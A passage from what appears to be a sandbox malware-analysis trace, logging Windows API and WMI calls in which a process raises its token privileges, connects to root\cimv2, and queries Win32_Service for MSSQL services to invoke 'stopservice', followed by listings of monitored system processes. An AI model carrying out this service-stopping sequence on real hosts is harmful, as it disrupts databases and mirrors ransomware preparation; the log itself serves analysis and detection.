from the system.\n13 - The service failed to find the service needed from a dependent service.\n14 - The service has been disabled from the system.\n15 - The service does not have the correct authentication to run on the system.\n16 - This service is being removed from the system.\n17 - There is no execution thread for the service.\n18 - There are circular dependencies when starting the service.\n19 - There is a service running under the same name.\n20 - There are invalid characters in the name of the service.\n21 - Invalid parameters have been passed to the service.\n22 - The account, which this service is to run under is either invalid or lacks the permissions to run the service.\n23 - The service exists in the database of services available from the system.\n24 - The service is currently paused in the system.\nOther - For integer values other than those listed above, refer to Win32 error code documentation.", varVal2=0x2ac), plFlavor=0x0) returned 0x0 [0207.400] free (_Block=0x36cbc0) [0207.400] malloc (_Size=0x18) returned 0x36cbc0 [0207.400] IUnknown:Release (This=0x1e413b0) returned 0x0 [0207.400] malloc (_Size=0x70) returned 0x36d010 [0207.400] malloc (_Size=0x70) returned 0x36d1d0 [0207.401] malloc (_Size=0x48) returned 0x36d090 [0207.401] malloc (_Size=0x18) returned 0x36cc20 [0207.402] malloc (_Size=0x70) returned 0x36d250 [0207.402] malloc (_Size=0x70) returned 0x36d2d0 [0207.402] malloc (_Size=0x48) returned 0x36d350 [0207.402] malloc (_Size=0x50) returned 0x36d3a0 [0207.402] malloc (_Size=0x70) returned 0x36d400 [0207.402] malloc (_Size=0x70) returned 0x36d480 [0207.402] malloc (_Size=0x48) returned 0x36d500 [0207.402] free (_Block=0x36d350) [0207.402] free (_Block=0x36d2d0) [0207.402] free (_Block=0x36d250) [0207.402] free (_Block=0x36d090) [0207.402] free (_Block=0x36d1d0) [0207.402] free (_Block=0x36d010) [0207.402] IUnknown:Release (This=0x1e7c4a0) returned 0x0 [0207.402] free (_Block=0x36d180) [0207.402] free (_Block=0x36d100) [0207.402] free (_Block=0x36cf90) [0207.402] IWbemClassObject:NextMethod (in: This=0x1e7bfa0, lFlags=0, pstrName=0x24d238*=0x0, ppInSignature=0x24d240*=0x0, ppOutSignature=0x24d248*=0x0 | out: pstrName=0x24d238*="PauseService", ppInSignature=0x24d240*=0x0, ppOutSignature=0x24d248*=0x1e7c4a0) returned 0x0 [0207.402] lstrlenW (lpString="PauseService") returned 12 [0207.402] lstrlenW (lpString="stopservice") returned 11 [0207.402] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="PauseService", cchCount2=12) returned 3 [0207.402] IUnknown:Release (This=0x1e7c4a0) returned 0x0 [0207.402] IWbemClassObject:NextMethod (in: This=0x1e7bfa0, lFlags=0, pstrName=0x24d238*=0x0, ppInSignature=0x24d240*=0x0, ppOutSignature=0x24d248*=0x0 | out: pstrName=0x24d238*="ResumeService", ppInSignature=0x24d240*=0x0, ppOutSignature=0x24d248*=0x1e7c4a0) returned 0x0 [0207.403] lstrlenW (lpString="ResumeService") returned 13 [0207.403] lstrlenW (lpString="stopservice") returned 11 [0207.403] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ResumeService", cchCount2=13) returned 3 [0207.403] IUnknown:Release (This=0x1e7c4a0) returned 0x0 [0207.403] IWbemClassObject:NextMethod (in: This=0x1e7bfa0, lFlags=0, pstrName=0x24d238*=0x0, ppInSignature=0x24d240*=0x0, ppOutSignature=0x24d248*=0x0 | out: pstrName=0x24d238*="InterrogateService", ppInSignature=0x24d240*=0x0, ppOutSignature=0x24d248*=0x1e7c4a0) returned 0x0 [0207.403] lstrlenW (lpString="InterrogateService") returned 18 [0207.403] lstrlenW (lpString="stopservice") returned 11 [0207.403] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="InterrogateService", cchCount2=18) returned 3 [0207.403] IUnknown:Release (This=0x1e7c4a0) returned 0x0 [0207.403] IWbemClassObject:NextMethod (in: This=0x1e7bfa0, lFlags=0, pstrName=0x24d238*=0x0, ppInSignature=0x24d240*=0x0, ppOutSignature=0x24d248*=0x0 | out: pstrName=0x24d238*="UserControlService", ppInSignature=0x24d240*=0x1e7c520, ppOutSignature=0x24d248*=0x1e7ca20) returned 0x0 [0207.403] lstrlenW (lpString="UserControlService") returned 18 [0207.403] lstrlenW (lpString="stopservice") returned 11 [0207.403] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="UserControlService", cchCount2=18) returned 1 [0207.403] IUnknown:Release (This=0x1e7c520) returned 0x0 [0207.403] IUnknown:Release (This=0x1e7ca20) returned 0x0 [0207.403] IWbemClassObject:NextMethod (in: This=0x1e7bfa0, lFlags=0, pstrName=0x24d238*=0x0, ppInSignature=0x24d240*=0x0, ppOutSignature=0x24d248*=0x0 | out: pstrName=0x24d238*="Create", ppInSignature=0x24d240*=0x1e7e470, ppOutSignature=0x24d248*=0x1e7e970) returned 0x0 [0207.404] lstrlenW (lpString="Create") returned 6 [0207.404] lstrlenW (lpString="stopservice") returned 11 [0207.404] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Create", cchCount2=6) returned 3 [0207.404] IUnknown:Release (This=0x1e7e470) returned 0x0 [0207.404] IUnknown:Release (This=0x1e7e970) returned 0x0 [0207.404] IWbemClassObject:NextMethod (in: This=0x1e7bfa0, lFlags=0, pstrName=0x24d238*=0x0, ppInSignature=0x24d240*=0x0, ppOutSignature=0x24d248*=0x0 | out: pstrName=0x24d238*="Change", ppInSignature=0x24d240*=0x1e7e1f0, ppOutSignature=0x24d248*=0x1e7e6f0) returned 0x0 [0207.404] lstrlenW (lpString="Change") returned 6 [0207.404] lstrlenW (lpString="stopservice") returned 11 [0207.404] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Change", cchCount2=6) returned 3 [0207.404] IUnknown:Release (This=0x1e7e1f0) returned 0x0 [0207.404] IUnknown:Release (This=0x1e7e6f0) returned 0x0 [0207.404] IWbemClassObject:NextMethod (in: This=0x1e7bfa0, lFlags=0, pstrName=0x24d238*=0x0, ppInSignature=0x24d240*=0x0, ppOutSignature=0x24d248*=0x0 | out: pstrName=0x24d238*="ChangeStartMode", ppInSignature=0x24d240*=0x1e7c610, ppOutSignature=0x24d248*=0x1e7cb10) returned 0x0 [0207.405] lstrlenW (lpString="ChangeStartMode") returned 15 [0207.405] lstrlenW (lpString="stopservice") returned 11 [0207.405] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ChangeStartMode", cchCount2=15) returned 3 [0207.405] IUnknown:Release (This=0x1e7c610) returned 0x0 [0207.405] IUnknown:Release (This=0x1e7cb10) returned 0x0 [0207.405] IWbemClassObject:NextMethod (in: This=0x1e7bfa0, lFlags=0, pstrName=0x24d238*=0x0, ppInSignature=0x24d240*=0x0, ppOutSignature=0x24d248*=0x0 | out: pstrName=0x24d238*="Delete", ppInSignature=0x24d240*=0x0, ppOutSignature=0x24d248*=0x1e7c4a0) returned 0x0 [0207.405] lstrlenW (lpString="Delete") returned 6 [0207.405] lstrlenW (lpString="stopservice") returned 11 [0207.405] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Delete", cchCount2=6) returned 3 [0207.405] IUnknown:Release (This=0x1e7c4a0) returned 0x0 [0207.405] IWbemClassObject:NextMethod (in: This=0x1e7bfa0, lFlags=0, pstrName=0x24d238*=0x0, ppInSignature=0x24d240*=0x0, ppOutSignature=0x24d248*=0x0 | out: pstrName=0x24d238*="GetSecurityDescriptor", ppInSignature=0x24d240*=0x0, ppOutSignature=0x24d248*=0x1e7c640) returned 0x0 [0207.405] lstrlenW (lpString="GetSecurityDescriptor") returned 21 [0207.405] lstrlenW (lpString="stopservice") returned 11 [0207.405] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="GetSecurityDescriptor", cchCount2=21) returned 3 [0207.405] IUnknown:Release (This=0x1e7c640) returned 0x0 [0207.405] IWbemClassObject:NextMethod (in: This=0x1e7bfa0, lFlags=0, pstrName=0x24d238*=0x0, ppInSignature=0x24d240*=0x0, ppOutSignature=0x24d248*=0x0 | out: pstrName=0x24d238*="SetSecurityDescriptor", ppInSignature=0x24d240*=0x1e7c520, ppOutSignature=0x24d248*=0x1e7ca20) returned 0x0 [0207.405] lstrlenW (lpString="SetSecurityDescriptor") returned 21 [0207.405] lstrlenW (lpString="stopservice") returned 11 [0207.405] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="SetSecurityDescriptor", cchCount2=21) returned 3 [0207.406] IUnknown:Release (This=0x1e7c520) returned 0x0 [0207.406] IUnknown:Release (This=0x1e7ca20) returned 0x0 [0207.406] IWbemClassObject:NextMethod (in: This=0x1e7bfa0, lFlags=0, pstrName=0x24d238*=0x0, ppInSignature=0x24d240*=0x0, ppOutSignature=0x24d248*=0x0 | out: pstrName=0x24d238*=0x0, ppInSignature=0x24d240*=0x0, ppOutSignature=0x24d248*=0x0) returned 0x40005 [0207.406] IUnknown:Release (This=0x1e7bfa0) returned 0x0 [0207.406] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0207.406] lstrlenW (lpString="SET") returned 3 [0207.406] lstrlenW (lpString="call") returned 4 [0207.406] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0207.406] lstrlenW (lpString="CREATE") returned 6 [0207.406] lstrlenW (lpString="call") returned 4 [0207.406] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0207.406] free (_Block=0x368640) [0207.406] malloc (_Size=0x8) returned 0x367140 [0207.406] lstrlenW (lpString="GET") returned 3 [0207.406] lstrlenW (lpString="call") returned 4 [0207.406] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0207.406] lstrlenW (lpString="LIST") returned 4 [0207.406] lstrlenW (lpString="call") returned 4 [0207.406] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0207.406] lstrlenW (lpString="ASSOC") returned 5 [0207.406] lstrlenW (lpString="call") returned 4 [0207.406] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0207.406] WbemLocator:IUnknown:AddRef (This=0x1e41390) returned 0x3 [0207.406] free (_Block=0x367fb0) [0207.406] lstrlenW (lpString="") returned 0 [0207.407] lstrlenW (lpString="XDUWTFONO") returned 9 [0207.407] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0207.407] lstrlenW (lpString="XDUWTFONO") returned 9 [0207.407] malloc (_Size=0x14) returned 0x36cc40 [0207.407] lstrlenW (lpString="XDUWTFONO") returned 9 [0207.407] GetCurrentThreadId () returned 0x2ac [0207.407] GetCurrentProcess () returned 0xffffffffffffffff [0207.407] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x24f580 | out: TokenHandle=0x24f580*=0x29c) returned 1 [0207.407] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x24f578 | out: TokenInformation=0x0, ReturnLength=0x24f578) returned 0 [0207.407] malloc (_Size=0x118) returned 0x36cf90 [0207.407] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x3, TokenInformation=0x36cf90, TokenInformationLength=0x118, ReturnLength=0x24f578 | out: TokenInformation=0x36cf90, ReturnLength=0x24f578) returned 1 [0207.407] AdjustTokenPrivileges (in: TokenHandle=0x29c, DisableAllPrivileges=0, NewState=0x36cf90*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=58103023, Attributes=0xd231), (Luid.LowPart=0x0, Luid.HighPart=3567504, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=33554434, Attributes=0xd226), (Luid.LowPart=0x0, Luid.HighPart=3539288, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=151060488, Attributes=0x1000d22c))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0207.407] free (_Block=0x36cf90) [0207.407] CloseHandle (hObject=0x29c) returned 1 [0207.407] lstrlenW (lpString="GET") returned 3 [0207.407] lstrlenW (lpString="call") returned 4 [0207.407] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0207.407] lstrlenW (lpString="LIST") returned 4 [0207.407] lstrlenW (lpString="call") returned 4 [0207.407] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0207.407] lstrlenW (lpString="SET") returned 3 [0207.407] lstrlenW (lpString="call") returned 4 [0207.407] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0207.408] lstrlenW (lpString="CALL") returned 4 [0207.408] lstrlenW (lpString="call") returned 4 [0207.408] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0207.442] ??0CHString@@QEAA@XZ () returned 0x24f530 [0207.442] GetCurrentThreadId () returned 0x2ac [0207.442] malloc (_Size=0x18) returned 0x36cc60 [0207.442] malloc (_Size=0x18) returned 0x36cc80 [0207.442] malloc (_Size=0x18) returned 0x36cca0 [0207.442] malloc (_Size=0x18) returned 0x36ccc0 [0207.442] malloc (_Size=0x18) returned 0x36cce0 [0207.442] SysStringLen (param_1="\\\\") returned 0x2 [0207.442] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0207.443] malloc (_Size=0x18) returned 0x36cd00 [0207.443] SysStringLen (param_1="\\\\XDUWTFONO") returned 0xb [0207.443] SysStringLen (param_1="\\") returned 0x1 [0207.443] malloc (_Size=0x18) returned 0x36d580 [0207.443] SysStringLen (param_1="\\\\XDUWTFONO\\") returned 0xc [0207.443] SysStringLen (param_1="root\\cimv2") returned 0xa [0207.443] free (_Block=0x36cd00) [0207.443] free (_Block=0x36cce0) [0207.443] free (_Block=0x36ccc0) [0207.443] free (_Block=0x36cca0) [0207.443] free (_Block=0x36cc80) [0207.443] free (_Block=0x36cc60) [0207.443] malloc (_Size=0x18) returned 0x36cc60 [0207.443] malloc (_Size=0x18) returned 0x36cc80 [0207.443] malloc (_Size=0x18) returned 0x36cca0 [0207.444] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1e41390, strNetworkResource="\\\\XDUWTFONO\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff1c29d0 | out: ppNamespace=0xff1c29d0*=0x1e53b28) returned 0x0 [0208.001] free (_Block=0x36cca0) [0208.001] free (_Block=0x36cc80) [0208.001] free (_Block=0x36cc60) [0208.001] CoSetProxyBlanket (pProxy=0x1e53b28, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0208.001] free (_Block=0x36d580) [0208.001] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0208.003] ??0CHString@@QEAA@XZ () returned 0x24f2d8 [0208.003] GetCurrentThreadId () returned 0x2ac [0208.003] malloc (_Size=0x70) returned 0x36cf90 [0208.003] malloc (_Size=0x50) returned 0x36d010 [0208.003] malloc (_Size=0x50) returned 0x36d070 [0208.003] malloc (_Size=0x70) returned 0x36d0d0 [0208.003] malloc (_Size=0x70) returned 0x36d150 [0208.003] malloc (_Size=0x48) returned 0x36d1d0 [0208.003] malloc (_Size=0x18) returned 0x36cc60 [0208.003] lstrlenA (lpString="") returned 0 [0208.003] malloc (_Size=0x2) returned 0x367fb0 [0208.003] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff15314c, cbMultiByte=-1, lpWideCharStr=0x367fb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0208.003] free (_Block=0x367fb0) [0208.003] malloc (_Size=0x70) returned 0x36d220 [0208.004] malloc (_Size=0x48) returned 0x36d2a0 [0208.004] malloc (_Size=0x18) returned 0x36cc80 [0208.004] free (_Block=0x36cc60) [0208.004] IWbemServices:GetObject (in: This=0x1e53b28, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x24f308*=0x0, ppCallResult=0x0 | out: ppObject=0x24f308*=0x1e7c030, ppCallResult=0x0) returned 0x0 [0208.063] malloc (_Size=0x18) returned 0x36cc60 [0208.064] IWbemClassObject:GetMethod (in: This=0x1e7c030, wszName="stopservice", lFlags=0, ppInSignature=0x24f300, ppOutSignature=0x24f318 | out: ppInSignature=0x24f300*=0x0, ppOutSignature=0x24f318*=0x1e7c530) returned 0x0 [0208.064] free (_Block=0x36cc60) [0208.064] IUnknown:Release (This=0x1e7c530) returned 0x0 [0208.064] IUnknown:Release (This=0x1e7c030) returned 0x0 [0208.065] ??0CHString@@QEAA@XZ () returned 0x24f120 [0208.065] GetCurrentThreadId () returned 0x2ac [0208.065] malloc (_Size=0x18) returned 0x36cc60 [0208.065] lstrlenA (lpString="") returned 0 [0208.065] malloc (_Size=0x2) returned 0x367fb0 [0208.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff15314c, cbMultiByte=-1, lpWideCharStr=0x367fb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0208.065] free (_Block=0x367fb0) [0208.065] malloc (_Size=0x18) returned 0x36cca0 [0208.065] lstrlenA (lpString="") returned 0 [0208.065] malloc (_Size=0x2) returned 0x367fb0 [0208.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff15314c, cbMultiByte=-1, lpWideCharStr=0x367fb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0208.066] free (_Block=0x367fb0) [0208.066] malloc (_Size=0x18) returned 0x36ccc0 [0208.066] free (_Block=0x36cca0) [0208.067] malloc (_Size=0x18) returned 0x36cca0 [0208.067] lstrlenA (lpString="SELECT * FROM ") returned 14 [0208.067] malloc (_Size=0x1e) returned 0x36d2f0 [0208.067] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff154a40, cbMultiByte=-1, lpWideCharStr=0x36d2f0, cchWideChar=15 | out: lpWideCharStr="SELECT * FROM ") returned 15 [0208.067] free (_Block=0x36d2f0) [0208.067] malloc (_Size=0x18) returned 0x36cce0 [0208.067] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0208.067] SysStringLen (param_1="Win32_Service") returned 0xd [0208.067] free (_Block=0x36cca0) [0208.067] malloc (_Size=0x18) returned 0x36cca0 [0208.067] malloc (_Size=0x18) returned 0x36cd00 [0208.068] lstrlenA (lpString=" WHERE ") returned 7 [0208.068] malloc (_Size=0x10) returned 0x36d580 [0208.068] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff153e20, cbMultiByte=-1, lpWideCharStr=0x36d580, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8 [0208.068] free (_Block=0x36d580) [0208.068] malloc (_Size=0x18) returned 0x36d580 [0208.068] SysStringLen (param_1=" WHERE ") returned 0x7 [0208.068] SysStringLen (param_1="name like '%%MSSQL%%'") returned 0x15 [0208.068] malloc (_Size=0x18) returned 0x36d5a0 [0208.068] SysStringLen (param_1="SELECT * FROM Win32_Service") returned 0x1b [0208.068] SysStringLen (param_1=" WHERE name like '%%MSSQL%%'") returned 0x1c [0208.068] free (_Block=0x36cce0) [0208.068] free (_Block=0x36d580) [0208.068] free (_Block=0x36cd00) [0208.069] free (_Block=0x36cca0) [0208.069] malloc (_Size=0x18) returned 0x36cca0 [0208.069] IWbemServices:ExecQuery (in: This=0x1e53b28, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Service WHERE name like '%%MSSQL%%'", lFlags=48, pCtx=0x0, ppEnum=0x24f108 | out: ppEnum=0x24f108*=0x1e53c28) returned 0x0 [0208.102] free (_Block=0x36cca0) [0208.102] CoSetProxyBlanket (pProxy=0x1e53c28, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0208.143] IEnumWbemClassObject:Next (This=0x1e53c28, lTimeout=-1, uCount=0x1, apObjects=0x24f110, puReturned=0x24f298) Thread: id = 151 os_tid = 0x158 Thread: id = 153 os_tid = 0x708 Thread: id = 154 os_tid = 0x320 Thread: id = 155 os_tid = 0x38c Thread: id = 156 os_tid = 0x388 Process: id = "16" image_name = "wmiadap.exe" filename = "c:\\windows\\system32\\wbem\\wmiadap.exe" page_root = "0x3b432000" os_pid = "0x4e8" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x370" cmd_line = "wmiadap.exe /F /T /R" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000d057" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 159 os_tid = 0x4dc Thread: id = 160 os_tid = 0xa7c Thread: id = 161 os_tid = 0xaf8 Thread: id = 162 os_tid = 0xa78 Thread: id = 163 os_tid = 0x180 Thread: id = 164 os_tid = 0xb0c Process: id = "17" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x24f0e000" os_pid = "0x2c8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "6" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\WPCSvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b7a5" [0xc000000f], "LOCAL" [0x7] Thread: id = 165 os_tid = 0x92c Thread: id = 166 os_tid = 0x96c Thread: id = 167 os_tid = 0x8dc Thread: id = 168 os_tid = 0xb5c Thread: id = 169 os_tid = 0xa98 Thread: id = 170 os_tid = 0xa00 Thread: id = 171 os_tid = 0x418 Thread: id = 172 os_tid = 0x484 Thread: id = 173 os_tid = 0x5f8 Thread: id = 174 os_tid = 0x5f0 Thread: id = 175 os_tid = 0x5ec Thread: id = 176 os_tid = 0x5d0 Thread: id = 177 os_tid = 0x12c Thread: id = 178 os_tid = 0x170 Thread: id = 179 os_tid = 0x3c0 Thread: id = 180 os_tid = 0x3b8 Thread: id = 181 os_tid = 0x3a8 Thread: id = 182 os_tid = 0x2fc Thread: id = 183 os_tid = 0x2f8 Thread: id = 184 os_tid = 0x2d4 Thread: id = 185 os_tid = 0x2cc Thread: id = 187 os_tid = 0x83c Process: id = "18" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x9236000" os_pid = "0x11c" os_integrity_level = "0x4000" os_privileges = "0x60a00000" monitor_reason = "rpc_server" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k NetworkService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\CryptSvc" [0xa], "NT SERVICE\\Dnscache" [0xe], "NT SERVICE\\LanmanWorkstation" [0xa], "NT SERVICE\\napagent" [0xa], "NT SERVICE\\NlaSvc" [0xa], "NT SERVICE\\TapiSrv" [0xa], "NT SERVICE\\TermService" [0xa], "NT SERVICE\\Wecsvc" [0xa], "NT SERVICE\\WinRM" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000e33a" [0xc000000f], "LOCAL" [0x7] Thread: id = 194 os_tid = 0xaa4 Thread: id = 195 os_tid = 0x310 Thread: id = 196 os_tid = 0x670 Thread: id = 197 os_tid = 0x750 Thread: id = 198 os_tid = 0x6a0 Thread: id = 199 os_tid = 0x680 Thread: id = 200 os_tid = 0x66c Thread: id = 201 os_tid = 0x5fc Thread: id = 202 os_tid = 0x188 Thread: id = 203 os_tid = 0x140 Thread: id = 204 os_tid = 0x128 Thread: id = 205 os_tid = 0x2b0 Thread: id = 206 os_tid = 0x130 Thread: id = 207 os_tid = 0x218 Thread: id = 208 os_tid = 0x1cc Process: id = "19" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0xad16000" os_pid = "0x338" os_integrity_level = "0x4000" os_privileges = "0x60b16080" monitor_reason = "rpc_server" parent_id = "6" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AudioEndpointBuilder" [0xe], "NT SERVICE\\CscService" [0xa], "NT SERVICE\\dot3svc" [0xa], "NT SERVICE\\hidserv" [0xa], "NT SERVICE\\HomeGroupListener" [0xa], "NT SERVICE\\IPBusEnum" [0xa], "NT SERVICE\\Netman" [0xa], "NT SERVICE\\PcaSvc" [0xa], "NT SERVICE\\StorSvc" [0xa], "NT SERVICE\\TabletInputService" [0xa], "NT SERVICE\\TrkWks" [0xa], "NT SERVICE\\UmRdpService" [0xa], "NT SERVICE\\UxSms" [0xa], "NT SERVICE\\WdiSystemHost" [0xa], "NT SERVICE\\Wlansvc" [0xa], "NT SERVICE\\WPDBusEnum" [0xa], "NT SERVICE\\wudfsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000bc99" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 211 os_tid = 0xb30 Thread: id = 212 os_tid = 0xb18 Thread: id = 213 os_tid = 0x638 Thread: id = 214 os_tid = 0x554 Thread: id = 215 os_tid = 0x720 Thread: id = 216 os_tid = 0x668 Thread: id = 217 os_tid = 0x65c 